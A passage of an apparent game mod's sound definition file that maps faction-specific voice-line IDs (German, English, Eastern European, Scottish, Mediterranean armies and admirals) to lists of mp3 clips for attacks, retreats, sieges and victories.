["German_Admiral_Attacking_2.mp3","German_Admiral_Attacking_1.mp3","German_Admiral_Attacking_3.mp3"]), ("germank_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Attacking_2.mp3","German_Army_Fight_On_Battle_Map_1.mp3","German_Army_Fight_On_Battle_Map_2.mp3","German_Army_Fight_On_Battle_Map_3.mp3","German_Army_Fight_On_Battle_Map_4.mp3","German_Army_Fight_On_Battle_Map_5.mp3","German_General_Attacking_2.mp3","German_General_Attacking_Chivalry_2.mp3","German_General_Attacking_Dread_1.mp3","German_General_Fight_On_Battle_Map_1.mp3","German_General_Fight_On_Battle_Map_2.mp3","German_General_Fight_On_Battle_Map_3.mp3","German_General_Fight_On_Battle_Map_Chivalry_1.mp3","German_General_Fight_On_Battle_Map_Chivalry_2.mp3","German_General_Fight_On_Battle_Map_Chivalry_3.mp3","German_General_Fight_On_Battle_Map_Dread_1.mp3","German_General_Fight_On_Battle_Map_Dread_2.mp3","German_General_Fight_On_Battle_Map_Dread_3.mp3","German_Army_Attacking_1.mp3","German_Army_Attacking_3.mp3","German_Army_Fight_On_Battle_Map_6.mp3","German_General_Attacking_1.mp3","German_General_Attacking_3.mp3","German_General_Attacking_Chivalry_1.mp3","German_General_Attacking_Chivalry_3.mp3","German_General_Attacking_Dread_2.mp3","German_General_Attacking_Dread_3.mp3"]), ("germank_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Battle_lost_retreat_1.mp3","German_Army_Battle_lost_retreat_2.mp3","German_Army_Battle_lost_retreat_3.mp3","German_General_Battle_lost_retreat_1.mp3","German_General_Battle_lost_retreat_2.mp3","German_General_Battle_lost_retreat_3.mp3","German_General_Battle_lost_retreat_Chivalry_1.mp3","German_General_Battle_lost_retreat_Chivalry_2.mp3","German_General_Battle_lost_retreat_Chivalry_3.mp3","German_General_Battle_lost_retreat_Dread_1.mp3","German_General_Battle_lost_retreat_Dread_2.mp3","German_General_Battle_lost_retreat_Dread_3.mp3"]), ("germank_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Battle_won_2.mp3","German_Army_Battle_won_3.mp3","German_General_Battle_won_2.mp3","German_General_Battle_won_3.mp3","German_General_Battle_won_Chivalry_2.mp3","German_General_Battle_won_Chivalry_3.mp3","German_General_Battle_won_Dread_1.mp3","German_General_Battle_won_Dread_3.mp3","German_Army_Battle_won_1.mp3","German_General_Battle_won_1.mp3","German_General_Battle_won_Chivalry_1.mp3","German_General_Battle_won_Dread_2.mp3"]), ("germank_army_join", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Joins_Army_2.mp3","German_General_Joins_Army_2.mp3","German_General_Joins_Army_Dread_2.mp3","German_Army_Joins_Army_1.mp3","German_Army_Joins_Army_3.mp3","German_General_Joins_Army_1.mp3","German_General_Joins_Army_3.mp3","German_General_Joins_Army_Chivalry_1.mp3","German_General_Joins_Army_Chivalry_2.mp3","German_General_Joins_Army_Chivalry_3.mp3","German_General_Joins_Army_Dread_1.mp3","German_General_Joins_Army_Dread_3.mp3"]), ("germank_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Leaves_Army_3.mp3","German_General_Leaves_Army_3.mp3","German_General_Leaves_Army_Chivalry_1.mp3","German_General_Leaves_Army_Dread_2.mp3","German_General_Leaves_Army_Dread_3.mp3","German_Army_Leaves_Army_1.mp3","German_Army_Leaves_Army_2.mp3","German_General_Leaves_Army_1.mp3","German_General_Leaves_Army_2.mp3","German_General_Leaves_Army_Chivalry_2.mp3","German_General_Leaves_Army_Chivalry_3.mp3","German_General_Leaves_Army_Dread_1.mp3"]), ("germank_capture", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_Settlement_Capture_Celebration_1.mp3","German_Army_Settlement_Capture_Celebration_3.mp3","German_General_Settlement_Capture_Celebration_Chivalry_1.mp3","German_General_Settlement_Capture_Celebration_Chivalry_3.mp3","German_General_Settlement_Capture_Celebration_Dread_1.mp3","German_General_Settlement_Capture_Celebration_Dread_2.mp3","German_Army_Settlement_Capture_Celebration_2.mp3","German_General_Settlement_Capture_Celebration_1.mp3","German_General_Settlement_Capture_Celebration_2.mp3","German_General_Settlement_Capture_Celebration_3.mp3","German_General_Settlement_Capture_Celebration_Chivalry_2.mp3","German_General_Settlement_Capture_Celebration_Dread_3.mp3"]), ("germank_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["German_General_siege_Begun_Dread_1.mp3", "German_General_siege_Begun_Dread_2.mp3","German_Army_siege_Begun_1.mp3","German_Army_siege_Begun_2.mp3","German_General_siege_Begun_1.mp3","German_General_siege_Begun_2.mp3","German_General_siege_Begun_Chivalry_1.mp3","German_General_siege_Begun_Chivalry_2.mp3"]), ("germank_besieged", sf_2d|sf_priority_10|sf_vol_7, ["German_Army_siege_Besieged_3.mp3","German_General_siege_Besieged_3.mp3","German_General_siege_Besieged_Chivalry_1.mp3","German_General_siege_Besieged_Chivalry_2.mp3","German_General_siege_Besieged_Dread_1.mp3","German_General_siege_Besieged_Dread_3.mp3","German_Army_siege_Besieged_1.mp3","German_Army_siege_Besieged_2.mp3","German_General_siege_Besieged_1.mp3","German_General_siege_Besieged_2.mp3","German_General_siege_Besieged_Chivalry_3.mp3","German_General_siege_Besieged_Dread_2.mp3"]), ("germank_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["German_General_siege_Ongoing_Dread_2.mp3","German_General_siege_Ongoing_Dread_3.mp3","German_Army_siege_Ongoing_1.mp3","German_Army_siege_Ongoing_2.mp3","German_Army_siege_Ongoing_3.mp3","German_General_siege_Ongoing_1.mp3","German_General_siege_Ongoing_2.mp3","German_General_siege_Ongoing_3.mp3","German_General_siege_Ongoing_Chivalry_1.mp3","German_General_siege_Ongoing_Chivalry_2.mp3","German_General_siege_Ongoing_Chivalry_3.mp3","German_General_siege_Ongoing_Dread_1.mp3"]), #German #English ("engk_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["English_Admiral_Attacked_Enemy_1.mp3","English_Admiral_Attacked_Enemy_2.mp3","English_Admiral_Attacked_Enemy_3.mp3"]), ("engk_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["English_Admiral_Attacking_1.mp3","English_Admiral_Attacking_2.mp3","English_Admiral_Attacking_3.mp3"]), ("engk_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Attacking_1.mp3","English_Army_Attacking_2.mp3","English_Army_Attacking_3.mp3","English_Army_Fight_On_Battle_Map_1.mp3","English_Army_Fight_On_Battle_Map_2.mp3","English_Army_Fight_On_Battle_Map_3.mp3","English_Army_Fight_On_Battle_Map_4.mp3","English_Army_Fight_On_Battle_Map_5.mp3","English_General_Attacking_1.mp3","English_General_Attacking_2.mp3","English_General_Attacking_3.mp3","English_General_Attacking_Chivalry_1.mp3","English_General_Attacking_Chivalry_3.mp3","English_General_Attacking_Dread_1.mp3","English_General_Attacking_Dread_2.mp3","English_General_Attacking_Dread_3.mp3", "English_General_Attacking_Chivalry_2.mp3"]), ("engk_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Battle_lost_retreat_1.mp3","English_Army_Battle_lost_retreat_2.mp3","English_Army_Battle_lost_retreat_3.mp3","English_General_Battle_lost_retreat_1.mp3","English_General_Battle_lost_retreat_2.mp3","English_General_Battle_lost_retreat_3.mp3","English_General_Battle_lost_retreat_Chivalry_1.mp3","English_General_Battle_lost_retreat_Chivalry_2.mp3","English_General_Battle_lost_retreat_Chivalry_3.mp3","English_General_Battle_lost_retreat_Dread_1.mp3","English_General_Battle_lost_retreat_Dread_2.mp3","English_General_Battle_lost_retreat_Dread_3.mp3","English_General_Fight_On_Battle_Map_1.mp3","English_General_Fight_On_Battle_Map_2.mp3","English_General_Fight_On_Battle_Map_3.mp3","English_General_Fight_On_Battle_Map_Chivalry_1.mp3","English_General_Fight_On_Battle_Map_Chivalry_3.mp3","English_General_Fight_On_Battle_Map_Dread_1.mp3","English_General_Fight_On_Battle_Map_Dread_2.mp3","English_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("engk_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Battle_won_1.mp3","English_Army_Battle_won_2.mp3","English_Army_Battle_won_3.mp3","English_General_Battle_won_1.mp3","English_General_Battle_won_2.mp3","English_General_Battle_won_3.mp3","English_General_Battle_won_Chivalry_1.mp3","English_General_Battle_won_Chivalry_2.mp3","English_General_Battle_won_Chivalry_3.mp3","English_General_Battle_won_Dread_1.mp3","English_General_Battle_won_Dread_2.mp3","English_General_Battle_won_Dread_3.mp3"]), ("engk_army_join", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Joins_Army_1.mp3","English_Army_Joins_Army_2.mp3","English_Army_Joins_Army_3.mp3","English_General_Joins_Army_1.mp3","English_General_Joins_Army_2.mp3","English_General_Joins_Army_3.mp3","English_General_Joins_Army_Chivalry_1.mp3","English_General_Joins_Army_Chivalry_2.mp3","English_General_Joins_Army_Chivalry_3.mp3","English_General_Joins_Army_Dread_1.mp3","English_General_Joins_Army_Dread_2.mp3","English_General_Joins_Army_Dread_3.mp3"]), ("engk_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["English_General_Leaves_Army_1.mp3","English_General_Leaves_Army_2.mp3","English_General_Leaves_Army_3.mp3","English_General_Leaves_Army_Chivalry_1.mp3","English_General_Leaves_Army_Chivalry_2.mp3","English_General_Leaves_Army_Chivalry_3.mp3","English_General_Leaves_Army_Dread_1.mp3","English_General_Leaves_Army_Dread_2.mp3","English_General_Leaves_Army_Dread_3.mp3",]), ("engk_capture", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_Settlement_Capture_Celebration_1.mp3","English_Army_Settlement_Capture_Celebration_3.mp3","English_General_Settlement_Capture_Celebration_1.mp3","English_General_Settlement_Capture_Celebration_2.mp3","English_General_Settlement_Capture_Celebration_3.mp3","English_General_Settlement_Capture_Celebration_Chivalry_1.mp3","English_General_Settlement_Capture_Celebration_Chivalry_2.mp3","English_General_Settlement_Capture_Celebration_Chivalry_3.mp3","English_General_Settlement_Capture_Celebration_Dread_1.mp3","English_General_Settlement_Capture_Celebration_Dread_2.mp3","English_General_Settlement_Capture_Celebration_Dread_3.mp3"]), ("engk_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Begun_1.mp3","English_Army_siege_Begun_2.mp3","English_General_siege_Begun_1.mp3","English_General_siege_Begun_2.mp3","English_General_siege_Begun_Chivalry_1.mp3","English_General_siege_Begun_Chivalry_2.mp3","English_General_siege_Begun_Dread_1.mp3","English_General_siege_Begun_Dread_2.mp3"]), ("engk_besieged", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Besieged_1.mp3","English_Army_siege_Besieged_2.mp3","English_Army_siege_Besieged_3.mp3","English_General_siege_Besieged_1.mp3","English_General_siege_Besieged_2.mp3","English_General_siege_Besieged_3.mp3","English_General_siege_Besieged_Chivalry_1.mp3","English_General_siege_Besieged_Chivalry_2.mp3","English_General_siege_Besieged_Chivalry_3.mp3","English_General_siege_Besieged_Dread_1.mp3","English_General_siege_Besieged_Dread_2.mp3","English_General_siege_Besieged_Dread_3.mp3"]), ("engk_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["English_Army_siege_Ongoing_1.mp3","English_Army_siege_Ongoing_2.mp3","English_Army_siege_Ongoing_3.mp3","English_General_siege_Ongoing_1.mp3","English_General_siege_Ongoing_2.mp3","English_General_siege_Ongoing_3.mp3","English_General_siege_Ongoing_Chivalry_1.mp3","English_General_siege_Ongoing_Chivalry_2.mp3","English_General_siege_Ongoing_Chivalry_3.mp3","English_General_siege_Ongoing_Dread_1.mp3","English_General_siege_Ongoing_Dread_2.mp3","English_General_siege_Ongoing_Dread_3.mp3"]), #English #Eastern Euro ("easternk_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Admiral_Attacked_Enemy_1.mp3", "East_European_Admiral_Attacked_Enemy_2.mp3", "East_European_Admiral_Attacked_Enemy_3.mp3"]), ("easternk_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Admiral_Attacking_1.mp3", "East_European_Admiral_Attacking_2.mp3", "East_European_Admiral_Attacking_3.mp3"]), ("easternk_army_attacking", sf_2d|sf_priority_10|sf_vol_7, ["East_European_General_Attacking_2.mp3","East_European_Army_Attacking_1.mp3", "East_European_Army_Attacking_2.mp3", "East_European_Army_Attacking_3.mp3", "East_European_Army_Fight_On_Battle_Map_1.mp3", "East_European_Army_Fight_On_Battle_Map_2.mp3", "East_European_Army_Fight_On_Battle_Map_3.mp3", "East_European_Army_Fight_On_Battle_Map_4.mp3", "East_European_Army_Fight_On_Battle_Map_5.mp3", "East_European_Army_Fight_On_Battle_Map_6.mp3", "East_European_General_Attacking_1.mp3", "East_European_General_Attacking_3.mp3", "East_European_General_Attacking_Chivalry_1.mp3", "East_European_General_Attacking_Chivalry_2.mp3", "East_European_General_Attacking_Chivalry_3.mp3", "East_European_General_Attacking_Dread_1.mp3", "East_European_General_Attacking_Dread_2.mp3", "East_European_General_Attacking_Dread_3.mp3", "East_European_General_Fight_On_Battle_Map_1.mp3", "East_European_General_Fight_On_Battle_Map_2.mp3", "East_European_General_Fight_On_Battle_Map_3.mp3", "East_European_General_Fight_On_Battle_Map_Chivalry_1.mp3", "East_European_General_Fight_On_Battle_Map_Chivalry_2.mp3", "East_European_General_Fight_On_Battle_Map_Chivalry_3.mp3", "East_European_General_Fight_On_Battle_Map_Dread_1.mp3", "East_European_General_Fight_On_Battle_Map_Dread_2.mp3", "East_European_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("easternk_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["East_European_General_Battle_lost_retreat_2.mp3","East_European_Army_Battle_lost_retreat_2.mp3", "East_European_Army_Battle_lost_retreat_1.mp3", "East_European_Army_Battle_lost_retreat_3.mp3", "East_European_General_Battle_lost_retreat_1.mp3", "East_European_General_Battle_lost_retreat_3.mp3", "East_European_General_Battle_lost_retreat_Chivalry_1.mp3", "East_European_General_Battle_lost_retreat_Chivalry_2.mp3", "East_European_General_Battle_lost_retreat_Chivalry_3.mp3", "East_European_General_Battle_lost_retreat_Dread_1.mp3", "East_European_General_Battle_lost_retreat_Dread_2.mp3", "East_European_General_Battle_lost_retreat_Dread_3.mp3"]), ("easternk_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["East_European_Army_Battle_won_1.mp3", "East_European_Army_Battle_won_2.mp3", "East_European_Army_Battle_won_3.mp3", "East_European_General_Battle_won_1.mp3", "East_European_General_Battle_won_2.mp3", "East_European_General_Battle_won_3.mp3", "East_European_General_Battle_won_Chivalry_1.mp3", "East_European_General_Battle_won_Chivalry_2.mp3", "East_European_General_Battle_won_Chivalry_3.mp3", "East_European_General_Battle_won_Dread_1.mp3", "East_European_General_Battle_won_Dread_2.mp3", "East_European_General_Battle_won_Dread_3.mp3"]), ("easternk_army_join", sf_2d|sf_priority_10|sf_vol_7, ["East_European_General_Joins_Army_Chivalry_1.mp3", "East_European_General_Joins_Army_Chivalry_2.mp3", "East_European_General_Joins_Army_Chivalry_3.mp3","East_European_Army_Joins_Army_1.mp3", "East_European_Army_Joins_Army_2.mp3", "East_European_Army_Joins_Army_3.mp3", "East_European_General_Joins_Army_1.mp3", "East_European_General_Joins_Army_2.mp3", "East_European_General_Joins_Army_3.mp3", "East_European_General_Joins_Army_Dread_1.mp3", "East_European_General_Joins_Army_Dread_2.mp3"]), ("easternk_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["East_European_General_Leaves_Army_Chivalry_2.mp3","East_European_General_Leaves_Army_Chivalry_1.mp3","East_European_Army_Leaves_Army_2.mp3","East_European_Army_Leaves_Army_1.mp3", "East_European_Army_Leaves_Army_3.mp3", "East_European_General_Leaves_Army_1.mp3", "East_European_General_Leaves_Army_2.mp3", "East_European_General_Leaves_Army_3.mp3", "East_European_General_Leaves_Army_Dread_1.mp3", "East_European_General_Leaves_Army_Dread_3.mp3"]), ("easternk_capture", sf_2d|sf_priority_10|sf_vol_7, ["East_European_General_Settlement_Capture_Celebration_3.mp3","East_European_Army_Settlement_Capture_Celebration_1.mp3", "East_European_Army_Settlement_Capture_Celebration_2.mp3", "East_European_Army_Settlement_Capture_Celebration_3.mp3", "East_European_General_Settlement_Capture_Celebration_1.mp3", "East_European_General_Settlement_Capture_Celebration_2.mp3", "East_European_General_Settlement_Capture_Celebration_Chivalry_1.mp3", "East_European_General_Settlement_Capture_Celebration_Chivalry_2.mp3", "East_European_General_Settlement_Capture_Celebration_Chivalry_3.mp3", "East_European_General_Settlement_Capture_Celebration_Dread_1.mp3", "East_European_General_Settlement_Capture_Celebration_Dread_2.mp3",]), ("easternk_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["East_European_General_siege_Begun_Chivalry_1.mp3","East_European_General_siege_Begun_Chivalry_2.mp3","East_European_Army_siege_Begun_2.mp3","East_European_Army_siege_Begun_1.mp3", "East_European_General_siege_Begun_1.mp3", "East_European_General_siege_Begun_2.mp3", "East_European_General_siege_Begun_Dread_1.mp3", "East_European_General_siege_Begun_Dread_2.mp3" ]), ("easternk_besieged", sf_2d|sf_priority_10|sf_vol_7, ["East_European_General_siege_Besieged_1.mp3", "East_European_General_siege_Besieged_Chivalry_1.mp3","East_European_Army_siege_Besieged_1.mp3", "East_European_Army_siege_Besieged_2.mp3", "East_European_Army_siege_Besieged_3.mp3", "East_European_General_siege_Besieged_2.mp3", "East_European_General_siege_Besieged_3.mp3", "East_European_General_siege_Besieged_Chivalry_2.mp3", "East_European_General_siege_Besieged_Chivalry_3.mp3", "East_European_General_siege_Besieged_Dread_1.mp3", "East_European_General_siege_Besieged_Dread_2.mp3", "East_European_General_siege_Besieged_Dread_3.mp3"]), ("easternk_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["East_European_General_siege_Ongoing_Dread_3.mp3", "East_European_General_siege_Ongoing_Dread_1.mp3", "East_European_General_siege_Ongoing_Chivalry_2.mp3", "East_European_General_siege_Ongoing_Chivalry_1.mp3", "East_European_General_siege_Ongoing_2.mp3","East_European_Army_siege_Ongoing_1.mp3", "East_European_Army_siege_Ongoing_2.mp3", "East_European_Army_siege_Ongoing_3.mp3", "East_European_General_siege_Ongoing_1.mp3", "East_European_General_siege_Ongoing_3.mp3", "East_European_General_siege_Ongoing_1.mp3", "East_European_General_siege_Ongoing_3.mp3", "East_European_General_siege_Ongoing_Chivalry_3.mp3", "East_European_General_siege_Ongoing_Dread_2.mp3"]), #Eastern Euro #########Generic No King #Scotland ("scotg_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Admiral_Attacked_Enemy_1.mp3","Scottish_Admiral_Attacked_Enemy_2.mp3","Scottish_Admiral_Attacked_Enemy_3.mp3"]), ("scotg_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Admiral_Attacking_1.mp3","Scottish_Admiral_Attacking_2.mp3","Scottish_Admiral_Attacking_3.mp3"]), ("scotg_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Attacking_1.mp3","Scottish_Army_Attacking_2.mp3","Scottish_Army_Attacking_3.mp3","Scottish_Army_Fight_On_Battle_Map_1.mp3","Scottish_Army_Fight_On_Battle_Map_6.mp3","Scottish_General_Attacking_1.mp3","Scottish_General_Attacking_2.mp3","Scottish_General_Attacking_3.mp3","Scottish_General_Attacking_Chivalry_1.mp3","Scottish_General_Attacking_Chivalry_3.mp3","Scottish_General_Attacking_Dread_1.mp3","Scottish_General_Attacking_Dread_2.mp3","Scottish_General_Attacking_Dread_3.mp3","Scottish_General_Fight_On_Battle_Map_Dread_1.mp3","Scottish_General_Fight_On_Battle_Map_Dread_2.mp3","Scottish_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("scotg_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Battle_lost_retreat_1.mp3","Scottish_Army_Battle_lost_retreat_2.mp3","Scottish_Army_Battle_lost_retreat_3.mp3","Scottish_General_Battle_lost_retreat_1.mp3","Scottish_General_Battle_lost_retreat_2.mp3","Scottish_General_Battle_lost_retreat_3.mp3","Scottish_General_Battle_lost_retreat_Chivalry_1.mp3","Scottish_General_Battle_lost_retreat_Chivalry_2.mp3","Scottish_General_Battle_lost_retreat_Chivalry_3.mp3","Scottish_General_Battle_lost_retreat_Dread_1.mp3","Scottish_General_Battle_lost_retreat_Dread_2.mp3","Scottish_General_Battle_lost_retreat_Dread_3.mp3"]), ("scotg_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Battle_won_1.mp3","Scottish_Army_Battle_won_3.mp3","Scottish_General_Battle_won_2.mp3","Scottish_General_Battle_won_3.mp3","Scottish_General_Battle_won_Dread_1.mp3","Scottish_General_Battle_won_Dread_2.mp3","Scottish_General_Battle_won_Dread_3.mp3"]), ("scotg_army_join", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Joins_Army_1.mp3","Scottish_Army_Joins_Army_2.mp3","Scottish_Army_Joins_Army_3.mp3","Scottish_General_Joins_Army_1.mp3","Scottish_General_Joins_Army_2.mp3","Scottish_General_Joins_Army_3.mp3","Scottish_General_Joins_Army_Chivalry_2.mp3","Scottish_General_Joins_Army_Chivalry_3.mp3","Scottish_General_Joins_Army_Dread_1.mp3","Scottish_General_Joins_Army_Dread_2.mp3"]), ("scotg_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Leaves_Army_1.mp3","Scottish_Army_Leaves_Army_2.mp3","Scottish_Army_Leaves_Army_3.mp3","Scottish_General_Leaves_Army_1.mp3","Scottish_General_Leaves_Army_2.mp3","Scottish_General_Leaves_Army_3.mp3","Scottish_General_Leaves_Army_Chivalry_1.mp3","Scottish_General_Leaves_Army_Chivalry_2.mp3","Scottish_General_Leaves_Army_Chivalry_3.mp3","Scottish_General_Leaves_Army_Dread_1.mp3","Scottish_General_Leaves_Army_Dread_2.mp3","Scottish_General_Leaves_Army_Dread_3.mp3"]), ("scotg_capture", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_Settlement_Capture_Celebration_1.mp3","Scottish_Army_Settlement_Capture_Celebration_3.mp3","Scottish_General_Settlement_Capture_Celebration_1.mp3","Scottish_General_Settlement_Capture_Celebration_3.mp3","Scottish_General_Settlement_Capture_Celebration_Chivalry_3.mp3","Scottish_General_Settlement_Capture_Celebration_Dread_1.mp3","Scottish_General_Settlement_Capture_Celebration_Dread_2.mp3","Scottish_General_Settlement_Capture_Celebration_Dread_3.mp3"]), ("scotg_begin_siege", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_siege_Begun_1.mp3","Scottish_Army_siege_Begun_2.mp3","Scottish_General_siege_Begun_1.mp3","Scottish_General_siege_Begun_2.mp3","Scottish_General_siege_Begun_Chivalry_1.mp3","Scottish_General_siege_Begun_Chivalry_2.mp3","Scottish_General_siege_Begun_Dread_1.mp3","Scottish_General_siege_Begun_Dread_2.mp3"]), ("scotg_besieged", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_siege_Besieged_1.mp3","Scottish_Army_siege_Besieged_2.mp3","Scottish_Army_siege_Besieged_3.mp3","Scottish_General_siege_Besieged_1.mp3","Scottish_General_siege_Besieged_2.mp3","Scottish_General_siege_Besieged_3.mp3","Scottish_General_siege_Besieged_Chivalry_1.mp3","Scottish_General_siege_Besieged_Chivalry_2.mp3","Scottish_General_siege_Besieged_Chivalry_3.mp3","Scottish_General_siege_Besieged_Dread_1.mp3","Scottish_General_siege_Besieged_Dread_2.mp3","Scottish_General_siege_Besieged_Dread_3.mp3"]), ("scotg_siege_ongoing", sf_2d|sf_priority_10|sf_vol_7, ["Scottish_Army_siege_Ongoing_1.mp3","Scottish_Army_siege_Ongoing_2.mp3","Scottish_Army_siege_Ongoing_3.mp3","Scottish_General_siege_Ongoing_1.mp3","Scottish_General_siege_Ongoing_2.mp3","Scottish_General_siege_Ongoing_3.mp3","Scottish_General_siege_Ongoing_Chivalry_1.mp3","Scottish_General_siege_Ongoing_Chivalry_2.mp3","Scottish_General_siege_Ongoing_Chivalry_3.mp3","Scottish_General_siege_Ongoing_Dread_1.mp3","Scottish_General_siege_Ongoing_Dread_2.mp3","Scottish_General_siege_Ongoing_Dread_3.mp3"]), #Scotland #Mediterranean ("medig_admiral_attacked", sf_2d|sf_priority_10|sf_vol_7, ["Mediterranean_Admiral_Attacked_Enemy_1.mp3","Mediterranean_Admiral_Attacked_Enemy_2.mp3","Mediterranean_Admiral_Attacked_Enemy_3.mp3"]), ("medig_admiral_attacking", sf_2d|sf_priority_10|sf_vol_7, ["Mediterranean_Admiral_Attacking_1.mp3","Mediterranean_Admiral_Attacking_2.mp3","Mediterranean_Admiral_Attacking_3.mp3"]), ("medig_army_attack", sf_2d|sf_priority_10|sf_vol_7, ["Mediterranean_Army_Attacking_1.mp3","Mediterranean_Army_Attacking_2.mp3","Mediterranean_Army_Attacking_3.mp3","Mediterranean_Army_Fight_On_Battle_Map_1.mp3","Mediterranean_Army_Fight_On_Battle_Map_2.mp3","Mediterranean_Army_Fight_On_Battle_Map_3.mp3","Mediterranean_Army_Fight_On_Battle_Map_4.mp3","Mediterranean_Army_Fight_On_Battle_Map_5.mp3","Mediterranean_Army_Fight_On_Battle_Map_6.mp3","Mediterranean_General_Attacking_1.mp3","Mediterranean_General_Attacking_2.mp3","Mediterranean_General_Attacking_3.mp3","Mediterranean_General_Attacking_Chivalry_1.mp3","Mediterranean_General_Attacking_Chivalry_2.mp3","Mediterranean_General_Attacking_Chivalry_3.mp3","Mediterranean_General_Attacking_Dread_1.mp3","Mediterranean_General_Attacking_Dread_2.mp3","Mediterranean_General_Attacking_Dread_3.mp3" ,"Mediterranean_General_Fight_On_Battle_Map_1.mp3","Mediterranean_General_Fight_On_Battle_Map_2.mp3","Mediterranean_General_Fight_On_Battle_Map_3.mp3","Mediterranean_General_Fight_On_Battle_Map_Chivalry_1.mp3","Mediterranean_General_Fight_On_Battle_Map_Chivalry_2.mp3","Mediterranean_General_Fight_On_Battle_Map_Chivalry_3.mp3","Mediterranean_General_Fight_On_Battle_Map_Dread_1.mp3","Mediterranean_General_Fight_On_Battle_Map_Dread_2.mp3","Mediterranean_General_Fight_On_Battle_Map_Dread_3.mp3"]), ("medig_army_retreat", sf_2d|sf_priority_10|sf_vol_7, ["Mediterranean_Army_Battle_lost_retreat_1.mp3","Mediterranean_Army_Battle_lost_retreat_2.mp3","Mediterranean_Army_Battle_lost_retreat_3.mp3","Mediterranean_General_Battle_lost_retreat_1.mp3","Mediterranean_General_Battle_lost_retreat_2.mp3","Mediterranean_General_Battle_lost_retreat_3.mp3","Mediterranean_General_Battle_lost_retreat_Chivalry_1.mp3","Mediterranean_General_Battle_lost_retreat_Chivalry_2.mp3","Mediterranean_General_Battle_lost_retreat_Chivalry_3.mp3","Mediterranean_General_Battle_lost_retreat_Dread_1.mp3","Mediterranean_General_Battle_lost_retreat_Dread_2.mp3","Mediterranean_General_Battle_lost_retreat_Dread_3.mp3"]), ("medig_army_bwon", sf_2d|sf_priority_10|sf_vol_7, ["Mediterranean_Army_Battle_won_1.mp3","Mediterranean_Army_Battle_won_2.mp3","Mediterranean_Army_Battle_won_3.mp3","Mediterranean_General_Battle_won_1.mp3","Mediterranean_General_Battle_won_2.mp3","Mediterranean_General_Battle_won_3.mp3","Mediterranean_General_Battle_won_Chivalry_1.mp3","Mediterranean_General_Battle_won_Chivalry_2.mp3","Mediterranean_General_Battle_won_Chivalry_3.mp3","Mediterranean_General_Battle_won_Dread_1.mp3","Mediterranean_General_Battle_won_Dread_2.mp3","Mediterranean_General_Battle_won_Dread_3.mp3"]), ("medig_army_join", sf_2d|sf_priority_10|sf_vol_7, ["Mediterranean_Army_Joins_Army_1.mp3","Mediterranean_Army_Joins_Army_2.mp3","Mediterranean_Army_Joins_Army_3.mp3","Mediterranean_General_Joins_Army_1.mp3","Mediterranean_General_Joins_Army_2.mp3","Mediterranean_General_Joins_Army_3.mp3","Mediterranean_General_Joins_Army_Chivalry_1.mp3","Mediterranean_General_Joins_Army_Chivalry_2.mp3","Mediterranean_General_Joins_Army_Chivalry_3.mp3","Mediterranean_General_Joins_Army_Dread_1.mp3","Mediterranean_General_Joins_Army_Dread_2.mp3","Mediterranean_General_Joins_Army_Dread_3.mp3"]), ("medig_army_leave", sf_2d|sf_priority_10|sf_vol_7, ["Mediterranean_Army_Leaves_Army_1.mp3","Mediterranean_Army_Leaves_Army_2.mp3","Mediterranean_Army_Leaves_Army_3.mp3","Mediterranean_General_Leaves_Army_1.mp3","Mediterranean_General_Leaves_Army_2.mp3","Mediterranean_General_Leaves_Army_3.mp3","Mediterranean_General_Leaves_Army_Chivalry_1.mp3","Mediterranean_General_Leaves_Army_Chivalry_2.mp3","Mediterranean_General_Leaves_Army_Chivalry_3.mp3" ,"Mediterranean_General_Leaves_Army_Dread_1.mp3","Mediterranean_General_Leaves_Army_Dread_2.mp3","Mediterranean_General_Leaves_Army_Dread_3.mp3"]), ("medig_capture", sf_2d|sf_priority_10|sf_vol_7, 